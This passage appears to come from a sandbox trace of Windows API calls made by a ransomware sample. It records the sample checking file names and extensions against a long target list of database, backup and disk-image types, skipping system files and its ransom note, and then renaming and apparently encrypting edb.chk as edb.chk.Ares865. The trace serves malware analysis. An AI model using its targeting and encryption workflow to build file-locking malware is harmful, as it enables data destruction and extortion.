lpString2="fp4") returned -1 [0060.645] lstrlenW (lpString="fp5") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fp5") returned -1 [0060.645] lstrlenW (lpString="fp7") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fp7") returned -1 [0060.645] lstrlenW (lpString="fpt") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="fpt") returned -1 [0060.645] lstrlenW (lpString="frm") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="frm") returned -1 [0060.645] lstrlenW (lpString="gdb") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="gdb") returned -1 [0060.645] lstrlenW (lpString="gdb") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="gdb") returned -1 [0060.645] lstrlenW (lpString="grdb") returned 4 [0060.645] lstrcmpiW (lpString1=".chk", lpString2="grdb") returned -1 [0060.645] lstrlenW (lpString="gwi") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="gwi") returned -1 [0060.645] lstrlenW (lpString="hdb") returned 3 [0060.645] lstrcmpiW (lpString1="chk", lpString2="hdb") returned -1 [0060.645] lstrlenW (lpString="his") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="his") returned -1 [0060.646] lstrlenW (lpString="ib") returned 2 [0060.646] lstrcmpiW (lpString1="hk", lpString2="ib") returned -1 [0060.646] lstrlenW (lpString="idb") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="idb") returned -1 [0060.646] lstrlenW (lpString="ihx") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="ihx") returned -1 [0060.646] lstrlenW (lpString="itdb") returned 4 [0060.646] lstrcmpiW (lpString1=".chk", lpString2="itdb") returned -1 [0060.646] lstrlenW (lpString="itw") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="itw") returned -1 [0060.646] lstrlenW (lpString="jet") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="jet") returned -1 [0060.646] lstrlenW (lpString="jtx") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="jtx") returned -1 [0060.646] lstrlenW (lpString="kdb") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="kdb") returned -1 [0060.646] lstrlenW (lpString="kexi") returned 4 [0060.646] lstrcmpiW (lpString1=".chk", lpString2="kexi") returned -1 [0060.646] lstrlenW (lpString="kexic") returned 5 [0060.646] lstrcmpiW (lpString1="b.chk", lpString2="kexic") returned -1 [0060.646] lstrlenW (lpString="kexis") returned 5 [0060.646] lstrcmpiW (lpString1="b.chk", lpString2="kexis") returned -1 [0060.646] lstrlenW (lpString="lgc") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="lgc") returned -1 [0060.646] lstrlenW (lpString="lwx") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="lwx") returned -1 [0060.646] lstrlenW (lpString="maf") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="maf") returned -1 [0060.646] lstrlenW (lpString="maq") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="maq") returned -1 [0060.646] lstrlenW (lpString="mar") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="mar") returned -1 [0060.646] lstrlenW (lpString="marshal") returned 7 [0060.646] lstrlenW (lpString="mas") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="mas") returned -1 [0060.646] lstrlenW (lpString="mav") returned 3 [0060.646] lstrcmpiW (lpString1="chk", lpString2="mav") returned -1 [0060.647] lstrlenW (lpString="maw") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="maw") returned -1 [0060.647] lstrlenW (lpString="mdbhtml") returned 7 [0060.647] lstrlenW (lpString="mdn") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mdn") returned -1 [0060.647] lstrlenW (lpString="mdt") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mdt") returned -1 [0060.647] lstrlenW (lpString="mfd") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mfd") returned -1 [0060.647] lstrlenW (lpString="mpd") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mpd") returned -1 [0060.647] lstrlenW (lpString="mrg") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mrg") returned -1 [0060.647] lstrlenW (lpString="mud") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mud") returned -1 [0060.647] lstrlenW (lpString="mwb") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="mwb") returned -1 [0060.647] lstrlenW (lpString="myd") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="myd") returned -1 [0060.647] lstrlenW (lpString="ndf") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="ndf") returned -1 [0060.647] lstrlenW (lpString="nnt") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="nnt") returned -1 [0060.647] lstrlenW (lpString="nrmlib") returned 6 [0060.647] lstrcmpiW (lpString1="db.chk", lpString2="nrmlib") returned -1 [0060.647] lstrlenW (lpString="ns2") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="ns2") returned -1 [0060.647] lstrlenW (lpString="ns3") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="ns3") returned -1 [0060.647] lstrlenW (lpString="ns4") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="ns4") returned -1 [0060.647] lstrlenW (lpString="nsf") returned 3 [0060.647] lstrcmpiW (lpString1="chk", lpString2="nsf") returned -1 [0060.647] lstrlenW (lpString="nv") returned 2 [0060.647] lstrcmpiW (lpString1="hk", lpString2="nv") returned -1 [0060.648] lstrlenW (lpString="nv2") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="nv2") returned -1 [0060.648] lstrlenW (lpString="nwdb") returned 4 [0060.648] lstrcmpiW (lpString1=".chk", lpString2="nwdb") returned -1 [0060.648] lstrlenW (lpString="nyf") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="nyf") returned -1 [0060.648] lstrlenW (lpString="odb") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="odb") returned -1 [0060.648] lstrlenW (lpString="odb") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="odb") returned -1 [0060.648] lstrlenW (lpString="oqy") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="oqy") returned -1 [0060.648] lstrlenW (lpString="ora") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="ora") returned -1 [0060.648] lstrlenW (lpString="orx") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="orx") returned -1 [0060.648] lstrlenW (lpString="owc") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="owc") returned -1 [0060.648] lstrlenW (lpString="p96") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="p96") returned -1 [0060.648] lstrlenW (lpString="p97") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="p97") returned -1 [0060.648] lstrlenW (lpString="pan") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="pan") returned -1 [0060.648] lstrlenW (lpString="pdb") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="pdb") returned -1 [0060.648] lstrlenW (lpString="pdm") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="pdm") returned -1 [0060.648] lstrlenW (lpString="pnz") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="pnz") returned -1 [0060.648] lstrlenW (lpString="qry") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="qry") returned -1 [0060.648] lstrlenW (lpString="qvd") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="qvd") returned -1 [0060.648] lstrlenW (lpString="rbf") returned 3 [0060.648] lstrcmpiW (lpString1="chk", lpString2="rbf") returned -1 [0060.648] lstrlenW (lpString="rctd") returned 4 [0060.648] lstrcmpiW (lpString1=".chk", lpString2="rctd") returned -1 [0060.649] lstrlenW (lpString="rod") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="rod") returned -1 [0060.649] lstrlenW (lpString="rodx") returned 4 [0060.649] lstrcmpiW (lpString1=".chk", lpString2="rodx") returned -1 [0060.649] lstrlenW (lpString="rpd") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="rpd") returned -1 [0060.649] lstrlenW (lpString="rsd") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="rsd") returned -1 [0060.649] lstrlenW (lpString="sas7bdat") returned 8 [0060.649] lstrlenW (lpString="sbf") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="sbf") returned -1 [0060.649] lstrlenW (lpString="scx") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="scx") returned -1 [0060.649] lstrlenW (lpString="sdb") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="sdb") returned -1 [0060.649] lstrlenW (lpString="sdc") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="sdc") returned -1 [0060.649] lstrlenW (lpString="sdf") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="sdf") returned -1 [0060.649] lstrlenW (lpString="sis") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="sis") returned -1 [0060.649] lstrlenW (lpString="spq") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="spq") returned -1 [0060.649] lstrlenW (lpString="te") returned 2 [0060.649] lstrcmpiW (lpString1="hk", lpString2="te") returned -1 [0060.649] lstrlenW (lpString="teacher") returned 7 [0060.649] lstrlenW (lpString="tmd") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="tmd") returned -1 [0060.649] lstrlenW (lpString="tps") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="tps") returned -1 [0060.649] lstrlenW (lpString="trc") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="trc") returned -1 [0060.649] lstrlenW (lpString="trc") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="trc") returned -1 [0060.649] lstrlenW (lpString="trm") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="trm") returned -1 [0060.649] lstrlenW (lpString="udb") returned 3 [0060.649] lstrcmpiW (lpString1="chk", lpString2="udb") returned -1 [0060.650] lstrlenW (lpString="udl") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="udl") returned -1 [0060.650] lstrlenW (lpString="usr") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="usr") returned -1 [0060.650] lstrlenW (lpString="v12") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="v12") returned -1 [0060.650] lstrlenW (lpString="vis") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="vis") returned -1 [0060.650] lstrlenW (lpString="vpd") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="vpd") returned -1 [0060.650] lstrlenW (lpString="vvv") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="vvv") returned -1 [0060.650] lstrlenW (lpString="wdb") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="wdb") returned -1 [0060.650] lstrlenW (lpString="wmdb") returned 4 [0060.650] lstrcmpiW (lpString1=".chk", lpString2="wmdb") returned -1 [0060.650] lstrlenW (lpString="wrk") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="wrk") returned -1 [0060.650] lstrlenW (lpString="xdb") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="xdb") returned -1 [0060.650] lstrlenW (lpString="xld") returned 3 [0060.650] lstrcmpiW (lpString1="chk", lpString2="xld") returned -1 [0060.650] lstrlenW (lpString="xmlff") returned 5 [0060.650] lstrcmpiW (lpString1="b.chk", lpString2="xmlff") returned -1 [0060.650] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.chk.Ares865") returned 75 [0060.650] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb.chk"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.chk.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb.chk.ares865"), dwFlags=0x1) returned 1 [0060.651] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.chk.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edb.chk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.651] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0060.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0060.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.651] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.652] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.652] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.652] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x164 [0060.654] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x190000 [0060.655] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.656] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.656] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.656] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.656] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.657] CloseHandle (hObject=0x164) returned 1 [0060.657] CloseHandle (hObject=0x15c) returned 1 [0060.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0060.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.657] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.657] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7bc3a13, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb.log", cAlternateFileName="")) returned 1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="aoldtz.exe") returned 1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2=".") returned 1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="..") returned 1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="windows") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="bootmgr") returned 1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="temp") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="pagefile.sys") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="boot") returned 1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="ids.txt") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="ntuser.dat") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="perflogs") returned -1 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2="MSBuild") returned -1 [0060.657] lstrlenW (lpString="edb.log") returned 7 [0060.657] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edb.chk") returned 67 [0060.657] lstrcpyW (in: lpString1=0x2cce478, lpString2="edb.log" | out: lpString1="edb.log") returned="edb.log" [0060.657] lstrlenW (lpString="edb.log") returned 7 [0060.657] lstrlenW (lpString="Ares865") returned 7 [0060.657] lstrlenW (lpString=".dll") returned 4 [0060.657] lstrcmpiW (lpString1="edb.log", lpString2=".dll") returned 1 [0060.657] lstrlenW (lpString=".lnk") returned 4 [0060.658] lstrcmpiW (lpString1="edb.log", lpString2=".lnk") returned 1 [0060.658] lstrlenW (lpString=".ini") returned 4 [0060.658] lstrcmpiW (lpString1="edb.log", lpString2=".ini") returned 1 [0060.658] lstrlenW (lpString=".sys") returned 4 [0060.658] lstrcmpiW (lpString1="edb.log", lpString2=".sys") returned 1 [0060.658] lstrlenW (lpString="edb.log") returned 7 [0060.658] lstrlenW (lpString="bak") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="bak") returned 1 [0060.658] lstrlenW (lpString="ba_") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="ba_") returned 1 [0060.658] lstrlenW (lpString="dbb") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="dbb") returned 1 [0060.658] lstrlenW (lpString="vmdk") returned 4 [0060.658] lstrcmpiW (lpString1=".log", lpString2="vmdk") returned -1 [0060.658] lstrlenW (lpString="rar") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="rar") returned -1 [0060.658] lstrlenW (lpString="zip") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="zip") returned -1 [0060.658] lstrlenW (lpString="tgz") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="tgz") returned -1 [0060.658] lstrlenW (lpString="vbox") returned 4 [0060.658] lstrcmpiW (lpString1=".log", lpString2="vbox") returned -1 [0060.658] lstrlenW (lpString="vdi") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="vdi") returned -1 [0060.658] lstrlenW (lpString="vhd") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="vhd") returned -1 [0060.658] lstrlenW (lpString="vhdx") returned 4 [0060.658] lstrcmpiW (lpString1=".log", lpString2="vhdx") returned -1 [0060.658] lstrlenW (lpString="avhd") returned 4 [0060.658] lstrcmpiW (lpString1=".log", lpString2="avhd") returned -1 [0060.658] lstrlenW (lpString="db") returned 2 [0060.658] lstrcmpiW (lpString1="og", lpString2="db") returned 1 [0060.658] lstrlenW (lpString="db2") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="db2") returned 1 [0060.658] lstrlenW (lpString="db3") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="db3") returned 1 [0060.658] lstrlenW (lpString="dbf") returned 3 [0060.658] lstrcmpiW (lpString1="log", lpString2="dbf") returned 1 [0060.659] lstrlenW (lpString="mdf") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="mdf") returned -1 [0060.659] lstrlenW (lpString="mdb") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="mdb") returned -1 [0060.659] lstrlenW (lpString="sql") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="sql") returned -1 [0060.659] lstrlenW (lpString="sqlite") returned 6 [0060.659] lstrcmpiW (lpString1="db.log", lpString2="sqlite") returned -1 [0060.659] lstrlenW (lpString="sqlite3") returned 7 [0060.659] lstrlenW (lpString="sqlitedb") returned 8 [0060.659] lstrlenW (lpString="xml") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="xml") returned -1 [0060.659] lstrlenW (lpString="$er") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="$er") returned 1 [0060.659] lstrlenW (lpString="4dd") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="4dd") returned 1 [0060.659] lstrlenW (lpString="4dl") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="4dl") returned 1 [0060.659] lstrlenW (lpString="^^^") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="^^^") returned 1 [0060.659] lstrlenW (lpString="abs") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="abs") returned 1 [0060.659] lstrlenW (lpString="abx") returned 3 [0060.659] lstrcmpiW (lpString1="log", lpString2="abx") returned 1 [0060.659] lstrlenW (lpString="accdb") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accdb") returned 1 [0060.659] lstrlenW (lpString="accdc") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accdc") returned 1 [0060.659] lstrlenW (lpString="accde") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accde") returned 1 [0060.659] lstrlenW (lpString="accdr") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accdr") returned 1 [0060.659] lstrlenW (lpString="accdt") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accdt") returned 1 [0060.659] lstrlenW (lpString="accdw") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accdw") returned 1 [0060.659] lstrlenW (lpString="accft") returned 5 [0060.659] lstrcmpiW (lpString1="b.log", lpString2="accft") returned 1 [0060.659] lstrlenW (lpString="adb") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0060.660] lstrlenW (lpString="adb") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0060.660] lstrlenW (lpString="ade") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="ade") returned 1 [0060.660] lstrlenW (lpString="adf") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="adf") returned 1 [0060.660] lstrlenW (lpString="adn") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="adn") returned 1 [0060.660] lstrlenW (lpString="adp") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="adp") returned 1 [0060.660] lstrlenW (lpString="alf") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="alf") returned 1 [0060.660] lstrlenW (lpString="ask") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="ask") returned 1 [0060.660] lstrlenW (lpString="btr") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="btr") returned 1 [0060.660] lstrlenW (lpString="cat") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="cat") returned 1 [0060.660] lstrlenW (lpString="cdb") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="cdb") returned 1 [0060.660] lstrlenW (lpString="ckp") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="ckp") returned 1 [0060.660] lstrlenW (lpString="cma") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="cma") returned 1 [0060.660] lstrlenW (lpString="cpd") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="cpd") returned 1 [0060.660] lstrlenW (lpString="dacpac") returned 6 [0060.660] lstrcmpiW (lpString1="db.log", lpString2="dacpac") returned 1 [0060.660] lstrlenW (lpString="dad") returned 3 [0060.660] lstrcmpiW (lpString1="log", lpString2="dad") returned 1 [0060.660] lstrlenW (lpString="dadiagrams") returned 10 [0060.660] lstrlenW (lpString="daschema") returned 8 [0060.660] lstrlenW (lpString="db-journal") returned 10 [0060.660] lstrlenW (lpString="db-shm") returned 6 [0060.660] lstrcmpiW (lpString1="db.log", lpString2="db-shm") returned -1 [0060.660] lstrlenW (lpString="db-wal") returned 6 [0060.660] lstrcmpiW (lpString1="db.log", lpString2="db-wal") returned -1 [0060.661] lstrlenW (lpString="dbc") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dbc") returned 1 [0060.661] lstrlenW (lpString="dbs") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dbs") returned 1 [0060.661] lstrlenW (lpString="dbt") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dbt") returned 1 [0060.661] lstrlenW (lpString="dbv") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dbv") returned 1 [0060.661] lstrlenW (lpString="dbx") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dbx") returned 1 [0060.661] lstrlenW (lpString="dcb") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dcb") returned 1 [0060.661] lstrlenW (lpString="dct") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dct") returned 1 [0060.661] lstrlenW (lpString="dcx") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dcx") returned 1 [0060.661] lstrlenW (lpString="ddl") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="ddl") returned 1 [0060.661] lstrlenW (lpString="dlis") returned 4 [0060.661] lstrcmpiW (lpString1=".log", lpString2="dlis") returned -1 [0060.661] lstrlenW (lpString="dp1") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dp1") returned 1 [0060.661] lstrlenW (lpString="dqy") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dqy") returned 1 [0060.661] lstrlenW (lpString="dsk") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dsk") returned 1 [0060.661] lstrlenW (lpString="dsn") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dsn") returned 1 [0060.661] lstrlenW (lpString="dtsx") returned 4 [0060.661] lstrcmpiW (lpString1=".log", lpString2="dtsx") returned -1 [0060.661] lstrlenW (lpString="dxl") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="dxl") returned 1 [0060.661] lstrlenW (lpString="eco") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="eco") returned 1 [0060.661] lstrlenW (lpString="ecx") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="ecx") returned 1 [0060.661] lstrlenW (lpString="edb") returned 3 [0060.661] lstrcmpiW (lpString1="log", lpString2="edb") returned 1 [0060.661] lstrlenW (lpString="epim") returned 4 [0060.662] lstrcmpiW (lpString1=".log", lpString2="epim") returned -1 [0060.662] lstrlenW (lpString="fcd") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fcd") returned 1 [0060.662] lstrlenW (lpString="fdb") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fdb") returned 1 [0060.662] lstrlenW (lpString="fic") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fic") returned 1 [0060.662] lstrlenW (lpString="flexolibrary") returned 12 [0060.662] lstrlenW (lpString="fm5") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fm5") returned 1 [0060.662] lstrlenW (lpString="fmp") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fmp") returned 1 [0060.662] lstrlenW (lpString="fmp12") returned 5 [0060.662] lstrcmpiW (lpString1="b.log", lpString2="fmp12") returned -1 [0060.662] lstrlenW (lpString="fmpsl") returned 5 [0060.662] lstrcmpiW (lpString1="b.log", lpString2="fmpsl") returned -1 [0060.662] lstrlenW (lpString="fol") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fol") returned 1 [0060.662] lstrlenW (lpString="fp3") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fp3") returned 1 [0060.662] lstrlenW (lpString="fp4") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fp4") returned 1 [0060.662] lstrlenW (lpString="fp5") returned 3 [0060.662] lstrcmpiW (lpString1="log", lpString2="fp5") returned 1 [0060.662] lstrlenW (lpString="fp7") returned 3 [0060.662] lstrcmpiW (lpString1="log", 